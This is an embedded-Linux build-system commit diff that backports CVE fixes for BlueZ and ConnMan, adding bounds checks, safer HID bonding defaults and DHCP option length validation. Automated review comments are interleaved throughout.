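+ len = sizeof(state->cli_feat) - offset;
+ value = len ? &state->cli_feat[offset] : NULL;
+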
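Review bot: The three tag lines in this patch header start with a stray `+` (`+Upstream-Status:`, `+Signed-off-by:`, `+CVE:`), unlike the sibling patches added by this commit. Tooling that matches these tags at the start of a line may not see them, so the patch could be reported as lacking an Upstream-Status or CVE tag; the lines should read `Upstream-Status: Backport [...]`, `Signed-off-by: ...` and `CVE: CVE-2021-3588`. In the code itself, the new guard guarantees `len` is non-zero, so the NULL arm of `len ? ... : NULL` on the following line is no longer reachable.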
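--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2021-3658.patch
@@ -0,0 +1,95 @@
+From b497b5942a8beb8f89ca1c359c54ad67ec843055 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Thu, 24 Jun 2021 16:32:04 -0700
+Subject: [PATCH] adapter: Fix storing discoverable setting
+
+discoverable setting shall only be store when changed via Discoverable
+property and not when discovery client set it as that be considered
+temporary just for the lifetime of the discovery.
+
+Upstream-Status: Backport [https://github.com/bluez/bluez/commit/b497b5942a8beb8f89ca1c359c54ad67ec843055]
+Signed-off-by:Minjae Kim <flowergom@gmail.com>
+---
+ src/adapter.c | 35 ++++++++++++++++++++++-------------
+ 1 file changed, 22 insertions(+), 13 deletions(-)
+
+diff --git a/src/adapter.c b/src/adapter.c
+index 12e4ff5c0..663b778e4 100644
+--- a/src/adapter.c
++++ b/src/adapter.c
+@@ -560,7 +560,11 @@ static void settings_changed(struct btd_adapter *adapter, uint32_t settings)
+ if (changed_mask & MGMT_SETTING_DISCOVERABLE) {
+ g_dbus_emit_property_changed(dbus_conn, adapter->path,
+ ADAPTER_INTERFACE, "Discoverable");
+- store_adapter_info(adapter);
++ /* Only persist discoverable setting if it was not set
++ * temporarily by discovery.
++ */
++ if (!adapter->discovery_discoverable)
++ store_adapter_info(adapter);
+ btd_adv_manager_refresh(adapter->adv_manager);
+ }
+
+@@ -2162,8 +2166,6 @@ static bool filters_equal(struct mgmt_cp_start_service_discovery *a,
+ static int update_discovery_filter(struct btd_adapter *adapter)
+ {
+ struct mgmt_cp_start_service_discovery *sd_cp;
+- GSList *l;
+-
+
+ DBG("");
+
+@@ -2173,17 +2175,24 @@ static int update_discovery_filter(struct btd_adapter *adapter)
+ return -ENOMEM;
+ }
+
+- for (l = adapter->discovery_list; l; l = g_slist_next(l)) {
+- struct discovery_client *client = l->data;
++ /* Only attempt to overwrite current discoverable setting when not
++ * discoverable.
++ */
++ if (!(adapter->current_settings & MGMT_OP_SET_DISCOVERABLE)) {
++ GSList *l;
+
+- if (!client->discovery_filter)
+- continue;
++ for (l = adapter->discovery_list; l; l = g_slist_next(l)) {
++ struct discovery_client *client = l->data;
+
+- if (client->discovery_filter->discoverable)
+- break;
+- }
++ if (!client->discovery_filter)
++ continue;
+
+- set_discovery_discoverable(adapter, l ? true : false);
++ if (client->discovery_filter->discoverable) {
++ set_discovery_discoverable(adapter, true);
++ break;
++ }
++ }
++ }
+
+ /*
+ * If filters are equal, then don't update scan, except for when
+@@ -2216,8 +2225,7 @@ static int discovery_stop(struct discovery_client *client)
+ return 0;
+ }
+
+- if (adapter->discovery_discoverable)
+- set_discovery_discoverable(adapter, false);
++ set_discovery_discoverable(adapter, false);
+
+ /*
+ * In the idle phase of a discovery, there is no need to stop it
+@@ -6913,6 +6921,7 @@ static void adapter_stop(struct btd_adapter *adapter)
+ g_free(adapter->current_discovery_filter);
+ adapter->current_discovery_filter = NULL;
+
++ set_discovery_discoverable(adapter, false);
+ adapter->discovering = false;
+
+ while (adapter->connections) {
+--
+2.25.1
+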
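Review bot: In the `update_discovery_filter()` hunk the new guard tests `adapter->current_settings & MGMT_OP_SET_DISCOVERABLE`, whereas the `settings_changed()` hunk of the same patch tests the settings word against `MGMT_SETTING_DISCOVERABLE`. By its name the first is a management opcode rather than a settings bit, so the guard probably checks unrelated bits of `current_settings`; the constants' values are not visible here, so this should be confirmed against the header. If so, the line should be `if (!(adapter->current_settings & MGMT_SETTING_DISCOVERABLE)) {`, carried as a follow-up patch if upstream has since corrected it. The header also has no `CVE:` tag line, unlike the other patches added by this commit.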
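--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-0204.patch
@@ -0,0 +1,66 @@
+From 0d328fdf6564b67fc2ec3533e3da201ebabcc9e3 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Tue, 8 Jun 2021 16:46:49 -0700
+Subject: [PATCH] shared/gatt-server: Fix heap overflow when appending prepare
+ writes
+
+The code shall check if the prepare writes would append more the
+allowed maximum attribute length.
+
+Fixes https://github.com/bluez/bluez/security/advisories/GHSA-479m-xcq5-9g2q
+
+Upstream-Status: Backport [https://github.com/bluez/bluez/commit/591c546c536b42bef696d027f64aa22434f8c3f0]
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+CVE: CVE-2022-0204
+
+---
+ src/shared/gatt-server.c | 22 ++++++++++++++++++++++
+ 1 file changed, 22 insertions(+)
+
+diff --git a/src/shared/gatt-server.c b/src/shared/gatt-server.c
+index 0c25a97..20e14bc 100644
+--- a/src/shared/gatt-server.c
++++ b/src/shared/gatt-server.c
+@@ -816,6 +816,20 @@ static uint8_t authorize_req(struct bt_gatt_server *server,
+ server->authorize_data);
+ }
+
++static uint8_t check_length(uint16_t length, uint16_t offset)
++{
++ if (length > BT_ATT_MAX_VALUE_LEN)
++ return BT_ATT_ERROR_INVALID_ATTRIBUTE_VALUE_LEN;
++
++ if (offset > BT_ATT_MAX_VALUE_LEN)
++ return BT_ATT_ERROR_INVALID_OFFSET;
++
++ if (length + offset > BT_ATT_MAX_VALUE_LEN)
++ return BT_ATT_ERROR_INVALID_ATTRIBUTE_VALUE_LEN;
++
++ return 0;
++}
++
+ static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu,
+ uint16_t length, void *user_data)
+ {
+@@ -846,6 +860,10 @@ static void write_cb(struct bt_att_chan *chan, uint8_t opcode, const void *pdu,
+ (opcode == BT_ATT_OP_WRITE_REQ) ? "Req" : "Cmd",
+ handle);
+
++ ecode = check_length(length, 0);
++ if (ecode)
++ goto error;
++
+ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ if (ecode)
+ goto error;
+@@ -1353,6 +1371,10 @@ static void prep_write_cb(struct bt_att_chan *chan, uint8_t opcode,
+ util_debug(server->debug_callback, server->debug_data,
+ "Prep Write Req - handle: 0x%04x", handle);
+
++ ecode = check_length(length, offset);
++ if (ecode)
++ goto error;
++
+ ecode = check_permissions(server, attr, BT_ATT_PERM_WRITE_MASK);
+ if (ecode)
+ goto error;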
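Review bot: `check_length()` is added without a comment, and both callers pass it the `length` parameter of the ATT callback, which by the signatures shown is the PDU length rather than the attribute value length. If the handle (and, for prepare write, the offset) are still counted in that PDU length, the bound is slightly stricter than `BT_ATT_MAX_VALUE_LEN` on the value itself, which is safe but should be stated. Suggest a comment above the helper such as `/* length is the PDU length as received, so this bounds the stored value conservatively */`. The bodies of `write_cb` and `prep_write_cb` continue outside the hunks, so how `length` is consumed afterwards cannot be confirmed here.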
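--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-3637.patch
@@ -0,0 +1,39 @@
+From b808b2852a0b48c6f9dbb038f932613cea3126c2 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 27 Oct 2022 09:51:27 +0530
+Subject: [PATCH] CVE-2022-3637
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/monitor/jlink.c?id=1d6cfb8e625a944010956714c1802bc1e1fc6c4f]
+CVE: CVE-2022-3637
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+monitor: Fix crash when using RTT backend
+
+This fix regression introduced by "monitor: Fix memory leaks".
+J-Link shared library is in use if jlink_init() returns 0 and thus
+handle shall not be closed.
+---
+ monitor/jlink.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/monitor/jlink.c b/monitor/jlink.c
+index afa9d93..5bd4aed 100644
+--- a/monitor/jlink.c
++++ b/monitor/jlink.c
+@@ -120,9 +120,12 @@ int jlink_init(void)
+ !jlink.tif_select || !jlink.setspeed ||
+ !jlink.connect || !jlink.getsn ||
+ !jlink.emu_getproductname ||
+- !jlink.rtterminal_control || !jlink.rtterminal_read)
++ !jlink.rtterminal_control || !jlink.rtterminal_read) {
++ dlclose(so);
+ return -EIO;
++ }
+
++ /* don't dlclose(so) here cause symbols from it are in use now */
+ return 0;
+ }
+
+--
+2.25.1
+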
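Review bot: The new failure path calls `dlclose(so)` but leaves whichever `jlink.*` function pointers did resolve still set, and after the unload they point into a library that is no longer mapped. Whether anything can call them once `jlink_init()` has returned `-EIO` is outside this hunk, but clearing the table rules it out: add `memset(&jlink, 0, sizeof(jlink));` before the `return -EIO;`. `jlink_init()` starts above the hunk, so its earlier failure paths are not visible here.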
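--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2022-39176.patch
@@ -0,0 +1,126 @@
+From 752c7f707c3cc1eb12eadc13bc336a5c484d4bdf Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 28 Sep 2022 10:45:53 +0530
+Subject: [PATCH] CVE-2022-39176
+
+Upstream-Status: Backport [https://launchpad.net/ubuntu/+source/bluez/5.53-0ubuntu3.6]
+CVE: CVE-2022-39176
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ profiles/audio/avdtp.c | 56 +++++++++++++++++++++++++++---------------
+ profiles/audio/avrcp.c | 8 ++++++
+ 2 files changed, 44 insertions(+), 20 deletions(-)
+
+diff --git a/profiles/audio/avdtp.c b/profiles/audio/avdtp.c
+index 782268c..0adf413 100644
+--- a/profiles/audio/avdtp.c
++++ b/profiles/audio/avdtp.c
+@@ -1261,43 +1261,53 @@ struct avdtp_remote_sep *avdtp_find_remote_sep(struct avdtp *session,
+ return NULL;
+ }
+
+-static GSList *caps_to_list(uint8_t *data, int size,
++static GSList *caps_to_list(uint8_t *data, size_t size,
+ struct avdtp_service_capability **codec,
+ gboolean *delay_reporting)
+ {
++ struct avdtp_service_capability *cap;
+ GSList *caps;
+- int processed;
+
+ if (delay_reporting)
+ *delay_reporting = FALSE;
+
+- for (processed = 0, caps = NULL; processed + 2 <= size;) {
+- struct avdtp_service_capability *cap;
+- uint8_t length, category;
++ if (size < sizeof(*cap))
++ return NULL;
++
++ for (caps = NULL; size >= sizeof(*cap);) {
++ struct avdtp_service_capability *cpy;
+
+- category = data[0];
+- length = data[1];
++ cap = (struct avdtp_service_capability *)data;
+
+- if (processed + 2 + length > size) {
++ if (sizeof(*cap) + cap->length > size) {
+ error("Invalid capability data in getcap resp");
+ break;
+ }
+
+- cap = g_malloc(sizeof(struct avdtp_service_capability) +
+- length);
+- memcpy(cap, data, 2 + length);
++ if (cap->category == AVDTP_MEDIA_CODEC &&
++ cap->length < sizeof(**codec)) {
++ error("Invalid codec data in getcap resp");
++ break;
++ }
++
++ cpy = btd_malloc(sizeof(*cpy) + cap->length);
++ memcpy(cpy, cap, sizeof(*cap) + cap->length);
+
+- processed += 2 + length;
+- data += 2 + length;
++ size -= sizeof(*cap) + cap->length;
++ data += sizeof(*cap) + cap->length;
+
+- caps = g_slist_append(caps, cap);
++ caps = g_slist_append(caps, cpy);
+
+- if (category == AVDTP_MEDIA_CODEC &&
+- length >=
+- sizeof(struct avdtp_media_codec_capability))
+- *codec = cap;
+- else if (category == AVDTP_DELAY_REPORTING && delay_reporting)
+- *delay_reporting = TRUE;
++ switch (cap->category) {
++ case AVDTP_MEDIA_CODEC:
++ if (codec)
++ *codec = cpy;
++ break;
++ case AVDTP_DELAY_REPORTING:
++ if (delay_reporting)
++ *delay_reporting = TRUE;
++ break;
++ }
+ }
+
+ return caps;
+@@ -1494,6 +1504,12 @@ static gboolean avdtp_setconf_cmd(struct avdtp *session, uint8_t transaction,
+ &stream->codec,
+ &stream->delay_reporting);
+
++ if (!stream->caps || !stream->codec) {
++ err = AVDTP_UNSUPPORTED_CONFIGURATION;
++ category = 0x00;
++ goto failed_stream;
++ }
++
+ /* Verify that the Media Transport capability's length = 0. Reject otherwise */
+ for (l = stream->caps; l != NULL; l = g_slist_next(l)) {
+ struct avdtp_service_capability *cap = l->data;
+diff --git a/profiles/audio/avrcp.c b/profiles/audio/avrcp.c
+index d9471c0..0233d53 100644
+--- a/profiles/audio/avrcp.c
++++ b/profiles/audio/avrcp.c
+@@ -1916,6 +1916,14 @@ static size_t handle_vendordep_pdu(struct avctp *conn, uint8_t transaction,
+ goto err_metadata;
+ }
+
++ operands += sizeof(*pdu);
++ operand_count -= sizeof(*pdu);
++
++ if (pdu->params_len != operand_count) {
++ DBG("AVRCP PDU parameters length don't match");
++ pdu->params_len = operand_count;
++ }
++
+ for (handler = session->control_handlers; handler->pdu_id; handler++) {
+ if (handler->pdu_id == pdu->pdu_id)
+ break;
+--
+2.25.1
+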
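Review bot: In the avrcp.c hunk, `pdu->params_len` is compared with and assigned from `operand_count` with no byte-order conversion. The header declaration is outside the hunk; if `params_len` is held in network byte order, as a wire-format length field usually is, then on a little-endian host the comparison fails for every non-zero length and the field is overwritten with a host-order value that later readers would misinterpret as a much larger length. If that is the case the two lines should be `if (pdu->params_len != htons(operand_count)) {` and `pdu->params_len = htons(operand_count);`. `handle_vendordep_pdu()` starts and ends outside the hunk, so how the handlers read the field should be checked in the patched tree.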
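--- /dev/null
+++ b/meta/recipes-connectivity/bluez5/bluez5/CVE-2023-45866.patch
@@ -0,0 +1,54 @@
+From 25a471a83e02e1effb15d5a488b3f0085eaeb675 Mon Sep 17 00:00:00 2001
+From: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
+Date: Tue, 10 Oct 2023 13:03:12 -0700
+Subject: input.conf: Change default of ClassicBondedOnly
+
+This changes the default of ClassicBondedOnly since defaulting to false
+is not inline with HID specification which mandates the of Security Mode
+4:
+
+BLUETOOTH SPECIFICATION Page 84 of 123
+Human Interface Device (HID) Profile:
+
+5.4.3.4.2 Security Modes
+Bluetooth HID Hosts shall use Security Mode 4 when interoperating with
+Bluetooth HID devices that are compliant to the Bluetooth Core
+Specification v2.1+EDR[6].
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=25a471a83e02e1effb15d5a488b3f0085eaeb675]
+CVE: CVE-2023-45866
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ profiles/input/device.c | 2 +-
+ profiles/input/input.conf | 2 +-
+ 2 files changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/profiles/input/device.c b/profiles/input/device.c
+index 375314e..0236488 100644
+--- a/profiles/input/device.c
++++ b/profiles/input/device.c
+@@ -93,7 +93,7 @@ struct input_device {
+
+ static int idle_timeout = 0;
+ static bool uhid_enabled = false;
+-static bool classic_bonded_only = false;
++static bool classic_bonded_only = true;
+
+ void input_set_idle_timeout(int timeout)
+ {
+diff --git a/profiles/input/input.conf b/profiles/input/input.conf
+index 4c70bc5..d8645f3 100644
+--- a/profiles/input/input.conf
++++ b/profiles/input/input.conf
+@@ -17,7 +17,7 @@
+ # platforms may want to make sure that input connections only come from bonded
+ # device connections. Several older mice have been known for not supporting
+ # pairing/encryption.
+-# Defaults to false to maximize device compatibility.
++# Defaults to true for security.
+ #ClassicBondedOnly=true
+
+ # LE upgrade security
+--
+2.25.1
+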
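Review bot: The replacement comment in the input.conf hunk, `# Defaults to true for security.`, drops the compatibility remark the old line carried and does not tell an integrator what changes for an existing image. With the default flipped in device.c, classic HID devices that are not bonded are refused unless the option is set explicitly, which will surprise products that relied on the old default. Suggest `# Defaults to true for security; set to false only if unbonded classic HID devices must be accepted.` so the trade-off stays documented next to the option.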
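--- a/meta/recipes-connectivity/bluez5/bluez5_5.55.bb
+++ b/meta/recipes-connectivity/bluez5/bluez5_5.55.bb
@@ -3,6 +3,16 @@ require bluez5.inc
 SRC_URI[md5sum] = "94972b8bc7ade60c72b0ffa6ccff2c0a"
 SRC_URI[sha256sum] = "8863717113c4897e2ad3271fc808ea245319e6fd95eed2e934fae8e0894e9b88"
 
+# These issues have kernel fixes rather than bluez fixes so exclude here
+CVE_CHECK_WHITELIST += "CVE-2020-12352 CVE-2020-24490"
+
+# Commit 7a80d2096f1b7125085e21448112aa02f49f5e9a, e2b0f0d8d63e1223bb714a9efb37e2257818268b
+# and 0388794dc5fdb73a4ea88bcf148de0a12b4364d4 to fix CVE-2022-39177
+# already backport in CVE-2022-39176.patch
+# https://bugs.launchpad.net/ubuntu/+source/bluez/+bug/1977968
+
+CVE_CHECK_WHITELIST += "CVE-2022-39177"
+
 # noinst programs in Makefile.tools that are conditional on READLINE
 # support
 NOINST_TOOLS_READLINE ?= " \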
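Review bot: `CVE_CHECK_WHITELIST += "CVE-2022-39177"` records the issue as ignored, while the comment above it says the fix is carried in CVE-2022-39176.patch. A whitelist entry stays in the recipe even if that patch is later dropped or reworked on an upgrade, at which point the CVE would be masked without any fix applied. Listing both identifiers in the patch header instead, `CVE: CVE-2022-39176 CVE-2022-39177`, ties the status to the patch and lets the checker report it as patched; that the checker on this branch accepts several identifiers on one `CVE:` line should be confirmed first.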
diff --git a/meta/recipes-connectivity/connman/connman-gnome_0.7.bb b/meta/recipes-connectivity/connman/connman-gnome_0.7.bb
index 778bf50191..24593d6258 100644
--- a/meta/recipes-connectivity/connman/connman-gnome_0.7.bb
+++ b/meta/recipes-connectivity/connman/connman-gnome_0.7.bb
@@ -10,7 +10,7 @@ DEPENDS = "gtk+3 dbus-glib dbus-glib-native intltool-native gettext-native"
10 10
11# 0.7 tag 11# 0.7 tag
12SRCREV = "cf3c325b23dae843c5499a113591cfbc98acb143" 12SRCREV = "cf3c325b23dae843c5499a113591cfbc98acb143"
13SRC_URI = "git://github.com/connectivity/connman-gnome.git \ 13SRC_URI = "git://github.com/connectivity/connman-gnome.git;branch=master;protocol=https \
14 file://0001-Removed-icon-from-connman-gnome-about-applet.patch \ 14 file://0001-Removed-icon-from-connman-gnome-about-applet.patch \
15 file://null_check_for_ipv4_config.patch \ 15 file://null_check_for_ipv4_config.patch \
16 file://images/* \ 16 file://images/* \
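--- a/meta/recipes-connectivity/connman/connman.inc
+++ b/meta/recipes-connectivity/connman/connman.inc
@@ -15,6 +15,8 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
 
 inherit autotools pkgconfig systemd update-rc.d update-alternatives
 
+CVE_PRODUCT = "connman connection_manager"
+
 DEPENDS = "dbus glib-2.0 ppp"
 
 INC_PR = "r20"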
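--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-26675.patch
@@ -0,0 +1,62 @@
+From e4079a20f617a4b076af503f6e4e8b0304c9f2cb Mon Sep 17 00:00:00 2001
+From: Colin Wee <cwee@tesla.com>
+Date: Thu, 28 Jan 2021 19:41:53 +0100
+Subject: [PATCH] dnsproxy: Add length checks to prevent buffer overflow
+
+Fixes: CVE-2021-26675
+
+Upstream-Status: Backport
+CVE: CVE-2021-26675
+
+Reference to upstream patch:
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=e4079a20f617a4b076af503f6e4e8b0304c9f2cb
+
+Signed-off-by: Catalin Enache <catalin.enache@windriver.com>
+---
+ src/dnsproxy.c | 14 +++++++++++---
+ 1 file changed, 11 insertions(+), 3 deletions(-)
+
+diff --git a/src/dnsproxy.c b/src/dnsproxy.c
+index a7bf87a1..4f5c897f 100644
+--- a/src/dnsproxy.c
++++ b/src/dnsproxy.c
+@@ -1767,6 +1767,7 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ char **uncompressed_ptr)
+ {
+ char *uptr = *uncompressed_ptr; /* position in result buffer */
++ char * const uncomp_end = uncompressed + uncomp_len - 1;
+
+ debug("count %d ptr %p end %p uptr %p", field_count, ptr, end, uptr);
+
+@@ -1787,12 +1788,15 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ * tmp buffer.
+ */
+
+- ulen = strlen(name);
+- strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
+-
+ debug("pos %d ulen %d left %d name %s", pos, ulen,
+ (int)(uncomp_len - (uptr - uncompressed)), uptr);
+
++ ulen = strlen(name);
++ if ((uptr + ulen + 1) > uncomp_end) {
++ goto out;
++ }
++ strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
++
+ uptr += ulen;
+ *uptr++ = '\0';
+
+@@ -1802,6 +1806,10 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ * We copy also the fixed portion of the result (type, class,
+ * ttl, address length and the address)
+ */
++ if ((uptr + NS_RRFIXEDSZ) > uncomp_end) {
++ debug("uncompressed data too large for buffer");
++ goto out;
++ }
+ memcpy(uptr, ptr, NS_RRFIXEDSZ);
+
+ dns_type = uptr[0] << 8 | uptr[1];
+--
+2.17.1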
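Review bot: Both new bounds checks form a pointer past the destination before comparing it (`(uptr + ulen + 1) > uncomp_end` and `(uptr + NS_RRFIXEDSZ) > uncomp_end`), and that arithmetic is undefined once the sum lies beyond the end of `uncompressed`. Comparing lengths avoids it: `if (ulen + 1 > uncomp_end - uptr)` and `if (NS_RRFIXEDSZ > uncomp_end - uptr)`. In the same hunk the `debug()` call now sits above `ulen = strlen(name)` and the copy, so it prints `ulen` and `uptr` before they hold this name's data; CVE-2021-33833.patch later in this commit mentions fixing debug output, but its body is not visible here. `uncompress()` begins and ends outside the hunks.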
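--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0001.patch
@@ -0,0 +1,231 @@
+From 58d397ba74873384aee449690a9070bacd5676fa Mon Sep 17 00:00:00 2001
+From: Colin Wee <cwee@tesla.com>
+Date: Thu, 28 Jan 2021 19:39:14 +0100
+Subject: [PATCH] gdhcp: Avoid reading invalid data in dhcp_get_option
+
+Upstream-Status: Backport
+CVE: CVE-2021-26676
+
+Reference to upstream patch:
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=58d397ba74873384aee449690a9070bacd5676fa
+
+Signed-off-by: Catalin Enache <catalin.enache@windriver.com>
+---
+ gdhcp/client.c | 20 +++++++++++---------
+ gdhcp/common.c | 24 +++++++++++++++++++-----
+ gdhcp/common.h | 2 +-
+ gdhcp/server.c | 12 +++++++-----
+ 4 files changed, 38 insertions(+), 20 deletions(-)
+
+diff --git a/gdhcp/client.c b/gdhcp/client.c
+index 09dfe5ec..6a5613e7 100644
+--- a/gdhcp/client.c
++++ b/gdhcp/client.c
+@@ -1629,12 +1629,12 @@ static void start_request(GDHCPClient *dhcp_client)
+ NULL);
+ }
+
+-static uint32_t get_lease(struct dhcp_packet *packet)
++static uint32_t get_lease(struct dhcp_packet *packet, uint16_t packet_len)
+ {
+ uint8_t *option;
+ uint32_t lease_seconds;
+
+- option = dhcp_get_option(packet, DHCP_LEASE_TIME);
++ option = dhcp_get_option(packet, packet_len, DHCP_LEASE_TIME);
+ if (!option)
+ return 3600;
+
+@@ -2226,7 +2226,8 @@ static void get_dhcpv6_request(GDHCPClient *dhcp_client,
+ }
+ }
+
+-static void get_request(GDHCPClient *dhcp_client, struct dhcp_packet *packet)
++static void get_request(GDHCPClient *dhcp_client, struct dhcp_packet *packet,
++ uint16_t packet_len)
+ {
+ GDHCPOptionType type;
+ GList *list, *value_list;
+@@ -2237,7 +2238,7 @@ static void get_request(GDHCPClient *dhcp_client, struct dhcp_packet *packet)
+ for (list = dhcp_client->request_list; list; list = list->next) {
+ code = (uint8_t) GPOINTER_TO_INT(list->data);
+
+- option = dhcp_get_option(packet, code);
++ option = dhcp_get_option(packet, packet_len, code);
+ if (!option) {
+ g_hash_table_remove(dhcp_client->code_value_hash,
+ GINT_TO_POINTER((int) code));
+@@ -2297,6 +2298,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ re = dhcp_recv_l2_packet(&packet,
+ dhcp_client->listener_sockfd,
+ &dst_addr);
++ pkt_len = (uint16_t)(unsigned int)re;
+ xid = packet.xid;
+ } else if (dhcp_client->listen_mode == L3) {
+ if (dhcp_client->type == G_DHCP_IPV6) {
+@@ -2361,7 +2363,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ dhcp_client->status_code = status;
+ }
+ } else {
+- message_type = dhcp_get_option(&packet, DHCP_MESSAGE_TYPE);
++ message_type = dhcp_get_option(&packet, pkt_len, DHCP_MESSAGE_TYPE);
+ if (!message_type)
+ return TRUE;
+ }
+@@ -2378,7 +2380,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ dhcp_client->timeout = 0;
+ dhcp_client->retry_times = 0;
+
+- option = dhcp_get_option(&packet, DHCP_SERVER_ID);
++ option = dhcp_get_option(&packet, pkt_len, DHCP_SERVER_ID);
+ dhcp_client->server_ip = get_be32(option);
+ dhcp_client->requested_ip = ntohl(packet.yiaddr);
+
+@@ -2428,9 +2430,9 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+
+ remove_timeouts(dhcp_client);
+
+- dhcp_client->lease_seconds = get_lease(&packet);
++ dhcp_client->lease_seconds = get_lease(&packet, pkt_len);
+
+- get_request(dhcp_client, &packet);
++ get_request(dhcp_client, &packet, pkt_len);
+
+ switch_listening_mode(dhcp_client, L_NONE);
+
+@@ -2438,7 +2440,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ dhcp_client->assigned_ip = get_ip(packet.yiaddr);
+
+ if (dhcp_client->state == REBOOTING) {
+- option = dhcp_get_option(&packet,
++ option = dhcp_get_option(&packet, pkt_len,
+ DHCP_SERVER_ID);
+ dhcp_client->server_ip = get_be32(option);
+ }
+diff --git a/gdhcp/common.c b/gdhcp/common.c
+index 1d667d17..c8916aa8 100644
+--- a/gdhcp/common.c
++++ b/gdhcp/common.c
+@@ -73,18 +73,21 @@ GDHCPOptionType dhcp_get_code_type(uint8_t code)
+ return OPTION_UNKNOWN;
+ }
+
+-uint8_t *dhcp_get_option(struct dhcp_packet *packet, int code)
++uint8_t *dhcp_get_option(struct dhcp_packet *packet, uint16_t packet_len, int code)
+ {
+ int len, rem;
+- uint8_t *optionptr;
++ uint8_t *optionptr, *options_end;
++ size_t options_len;
+ uint8_t overload = 0;
+
+ /* option bytes: [code][len][data1][data2]..[dataLEN] */
+ optionptr = packet->options;
+ rem = sizeof(packet->options);
++ options_len = packet_len - (sizeof(*packet) - sizeof(packet->options));
++ options_end = optionptr + options_len - 1;
+
+ while (1) {
+- if (rem <= 0)
++ if ((rem <= 0) && (optionptr + OPT_CODE > options_end))
+ /* Bad packet, malformed option field */
+ return NULL;
+
+@@ -115,14 +118,25 @@ uint8_t *dhcp_get_option(struct dhcp_packet *packet, int code)
+ break;
+ }
+
++ if (optionptr + OPT_LEN > options_end) {
++ /* bad packet, would read length field from OOB */
++ return NULL;
++ }
++
+ len = 2 + optionptr[OPT_LEN];
+
+ rem -= len;
+ if (rem < 0)
+ continue; /* complain and return NULL */
+
+- if (optionptr[OPT_CODE] == code)
+- return optionptr + OPT_DATA;
++ if (optionptr[OPT_CODE] == code) {
++ if (optionptr + len > options_end) {
++ /* bad packet, option length points OOB */
++ return NULL;
++ } else {
++ return optionptr + OPT_DATA;
++ }
++ }
+
+ if (optionptr[OPT_CODE] == DHCP_OPTION_OVERLOAD)
+ overload |= optionptr[OPT_DATA];
+diff --git a/gdhcp/common.h b/gdhcp/common.h
+index 9660231c..8f63fd75 100644
+--- a/gdhcp/common.h
++++ b/gdhcp/common.h
+@@ -179,7 +179,7 @@ struct in6_pktinfo {
+ };
+ #endif
+
+-uint8_t *dhcp_get_option(struct dhcp_packet *packet, int code);
++uint8_t *dhcp_get_option(struct dhcp_packet *packet, uint16_t packet_len, int code);
+ uint8_t *dhcpv6_get_option(struct dhcpv6_packet *packet, uint16_t pkt_len,
+ int code, uint16_t *option_len, int *option_count);
+ uint8_t *dhcpv6_get_sub_option(unsigned char *option, uint16_t max_len,
+diff --git a/gdhcp/server.c b/gdhcp/server.c
+index 85405f19..52ea2a55 100644
+--- a/gdhcp/server.c
++++ b/gdhcp/server.c
+@@ -413,7 +413,7 @@ error:
+ }
+
+
+-static uint8_t check_packet_type(struct dhcp_packet *packet)
++static uint8_t check_packet_type(struct dhcp_packet *packet, uint16_t packet_len)
+ {
+ uint8_t *type;
+
+@@ -423,7 +423,7 @@ static uint8_t check_packet_type(struct dhcp_packet *packet)
+ if (packet->op != BOOTREQUEST)
+ return 0;
+
+- type = dhcp_get_option(packet, DHCP_MESSAGE_TYPE);
++ type = dhcp_get_option(packet, packet_len, DHCP_MESSAGE_TYPE);
+
+ if (!type)
+ return 0;
+@@ -651,6 +651,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ struct dhcp_lease *lease;
+ uint32_t requested_nip = 0;
+ uint8_t type, *server_id_option, *request_ip_option;
++ uint16_t packet_len;
+ int re;
+
+ if (condition & (G_IO_NVAL | G_IO_ERR | G_IO_HUP)) {
+@@ -661,12 +662,13 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ re = dhcp_recv_l3_packet(&packet, dhcp_server->listener_sockfd);
+ if (re < 0)
+ return TRUE;
++ packet_len = (uint16_t)(unsigned int)re;
+
+- type = check_packet_type(&packet);
++ type = check_packet_type(&packet, packet_len);
+ if (type == 0)
+ return TRUE;
+
+- server_id_option = dhcp_get_option(&packet, DHCP_SERVER_ID);
++ server_id_option = dhcp_get_option(&packet, packet_len, DHCP_SERVER_ID);
+ if (server_id_option) {
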